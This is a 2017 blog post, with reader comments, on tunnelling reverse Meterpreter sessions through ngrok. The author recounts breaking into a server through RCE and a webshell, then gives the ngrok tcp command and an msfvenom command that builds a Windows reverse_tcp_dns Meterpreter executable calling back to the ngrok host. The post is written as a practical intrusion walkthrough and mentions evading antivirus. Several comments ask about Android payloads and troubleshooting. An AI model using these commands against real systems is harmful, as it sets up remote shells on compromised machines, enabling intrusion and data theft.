Monday, May 1, 2017

Meterpreter over Ngrok

It's been a very interesting year for me. getting reverse meterpreter connections over ssh tunnels, paranoid mode, bypassing AVs, and even getting reverse VNC connection via "vnc dll injection" method to get a GUI view over a vulnerable server with no access to RDP. It's good to have a VPS just for this purpose. but there are times when I don't want to authenicate to my VPS and set a teamserver to connect my Armitage to the VPS, people tends to get lazy over doing things like this in a repeated manner. Hackers especially.

If using metasploit locally on the system, I can't always set up a reverse connection over NAT.

Now here's the Current Situation!

  • I found a server vulnerable to Remote RCE.
  • Uploaded a webshell to gather some info.
  • Uploaded an exe after carefully testing it against the AV installed over the server.
  • Booted up metasploit.
  • Tried to exploit it to get a bind shell but unforunately bind shell is not working (Firewall as always).
  • Let's do a Reverse then ;)
  • But there's another problem :(
  • I'm Sitting in office and sadly I don't have Router login credentials for setting up port forwarding :(


Now what to do?
Here comes Ngrok to the rescue. :D

What's Ngrok?
"secure introspected tunnels to localhost" & "Expose local servers behind NATs and firewalls to the public internet over secure tunnels." - direct from their website


Setting up Ngrok

1. Register to ngrok. (It doesn't verify the email id though)
2. once you're logged in, just follow the instruction. you'll get a screen like this.



3. Once the setup is done, run the following command to run ngrok to listen for tcp connect on a random port and forward it to our system over NAT.

./ngrok tcp 80



4. generating meterpreter exe with ngrok settings and setup a handler to accept reverse meterpreter connection.

msfvenom -p windows/meterpreter/reverse_tcp_dns lport=12791 lhost=<ngrok domain> -f exe -o test.exe

The above command will generate a simple exe with meterpreter stub. NOTE, I'm NOT sharing the techniques for bypassing AVs. Also, please do not upload your exe to any online scanner (if custom made), that's a very stupid thing to do. Better use vt-notify by @Mubix. A great tool!





5. Now execute the exe and you'll see the words that'll make you go crazy - "Sending Stage bytes" ;)




Now where did "127.0.0.1" came from? o_O

Ngrok is forwarding the connection to our local system so obviously, it will show "127.0.0.1" to us. When the handler receives the stager and starts sending the stage to the server, it goes through our localhost's forwarded port.

Ngrok Dashboard can help you see the number of connections you're having.



6. A drawback with this method, you can't get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port.


I Hope this helps.

Thanks & Cheers!!





6 comments:

  1. Wonderful work, thats new and it worked. Thanks for sharing!!

    ReplyDelete
  2. will this work with android_meterpreter_tcp??

    ReplyDelete
  3. YES sure it will and i am even working no something like "how to use fix url on the ngrok"

    ReplyDelete
  4. I'm having a problem with this.. I am able to receive target's action (which is running the payload) then after connecting to open session created by the target, I can't execute meterpreter commands. :/

    ReplyDelete
  5. hello,

    i was playing around with ngrok and metasploit and my virtual machines
    i have a problem with the reverse tcp exploit
    it doesn't gives the meterpreter payload..
    [-] Handler failed to bind to ip of ngrok ip :4444:-
    [] Started reverse TCP handler on 0.0.0.0:4444
    [-] Exploit aborted due to failure: unknown: remote ip :8080 - Error retrieving table prefix
    [] Exploit completed, but no session was created.

    it worth ngrok for this purpose ?

    what should i do ?

    thank you

    ReplyDelete
  6. but what if havent had any control over the target? (

    ReplyDelete